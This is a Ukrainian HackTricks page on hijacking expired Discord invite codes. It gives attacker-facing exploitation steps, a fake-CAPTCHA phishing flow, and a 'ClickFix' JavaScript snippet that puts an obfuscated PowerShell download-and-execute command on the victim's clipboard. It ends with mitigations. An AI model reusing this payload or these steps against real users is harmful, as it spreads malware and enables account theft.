# Discord Invite Hijacking {{#include ../../banners/hacktricks-training.md}} Вразливість системи запрошень Discord дозволяє зловмисникам отримувати доступ до застарілих або видалених кодів запрошень (тимчасових, постійних або кастомних) як нових посилань на будь-якому сервері з підвищенням рівня 3. Нормалізуючи всі коди до нижнього регістру, зловмисники можуть попередньо зареєструвати відомі коди запрошень і тихо перехоплювати трафік, як тільки оригінальне посилання закінчує термін дії або сервер-джерело втрачає своє підвищення. ## Типи запрошень та ризик перехоплення | Тип запрошення | Можна перехопити? | Умови / Коментарі | |-----------------------|-------------------|----------------------------------------------------------------------------------------------------------| | Тимчасове посилання | ✅ | Після закінчення терміну дії код стає доступним і може бути повторно зареєстрований як кастомне URL на підвищеному сервері. | | Постійне посилання | ⚠️ | Якщо видалено і складається лише з малих літер та цифр, код може знову стати доступним. | | Кастомне посилання | ✅ | Якщо оригінальний сервер втрачає своє підвищення рівня 3, його кастомне запрошення стає доступним для нової реєстрації. | ## Кроки експлуатації 1. Розвідка - Моніторинг публічних джерел (форумів, соціальних мереж, каналів Telegram) на наявність посилань на запрошення, що відповідають шаблону `discord.gg/{code}` або `discord.com/invite/{code}`. - Збір кодів запрошень, що вас цікавлять (тимчасових або кастомних). 2. Попередня реєстрація - Створіть або використовуйте існуючий сервер Discord з привілеями підвищення рівня 3. - У **Налаштуваннях сервера → Кастомне URL**, спробуйте призначити цільовий код запрошення. Якщо прийнято, код резервується зловмисним сервером. 3. Активація перехоплення - Для тимчасових запрошень чекайте, поки оригінальне запрошення не закінчить термін дії (або видаліть його вручну, якщо ви контролюєте джерело). - Для кодів, що містять великі літери, варіант з малими літерами можна отримати негайно, хоча перенаправлення активується лише після закінчення терміну дії. 4. Тихе перенаправлення - Користувачі, які відвідують старе посилання, безперешкодно перенаправляються на сервер, контрольований зловмисником, як тільки перехоплення активується. ## Потік фішингу через сервер Discord 1. Обмежте канали сервера так, щоб лише канал **#verify** був видимим. 2. Розгорніть бота (наприклад, **Safeguard#0786**), щоб запропонувати новачкам підтвердити свою особу через OAuth2. 3. Бот перенаправляє користувачів на фішинговий сайт (наприклад, `captchaguard.me`) під виглядом CAPTCHA або етапу перевірки. 4. Реалізуйте трюк UX **ClickFix**: - Відобразіть повідомлення про зламану CAPTCHA. - Скажіть користувачам відкрити діалог **Win+R**, вставити попередньо завантажену команду PowerShell і натиснути Enter. ### Приклад ін'єкції в буфер обміну ClickFix ```javascript // Copy malicious PowerShell command to clipboard const cmd = `powershell -NoExit -Command "$r='NJjeywEMXp3L3Fmcv02bj5ibpJWZ0NXYw9yL6MHc0RHa';` + `$u=($r[-1..-($r.Length)]-join '');` + `$url=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($u));` + `iex (iwr -Uri $url)"`; navigator.clipboard.writeText(cmd); ``` Цей підхід уникає прямих завантажень файлів і використовує знайомі елементи інтерфейсу, щоб знизити підозру користувачів. ## Заходи пом'якшення - Використовуйте постійні посилання на запрошення, що містять принаймні одну велику літеру або неалфавітний символ (ніколи не закінчуються, не підлягають повторному використанню). - Регулярно змінюйте коди запрошень і відкликайте старі посилання. - Моніторте статус підвищення сервера Discord і заяви про унікальні URL. - Навчайте користувачів перевіряти автентичність сервера та уникати виконання команд, вставлених з буфера обміну. ## Посилання - From Trust to Threat: Hijacked Discord Invites Used for Multi-Stage Malware Delivery – [https://research.checkpoint.com/2025/from-trust-to-threat-hijacked-discord-invites-used-for-multi-stage-malware-delivery/](https://research.checkpoint.com/2025/from-trust-to-threat-hijacked-discord-invites-used-for-multi-stage-malware-delivery/) - Discord Custom Invite Link Documentation – [https://support.discord.com/hc/en-us/articles/115001542132-Custom-Invite-Link](https://support.discord.com/hc/en-us/articles/115001542132-Custom-Invite-Link) {{#include ../../banners/hacktricks-training.md}}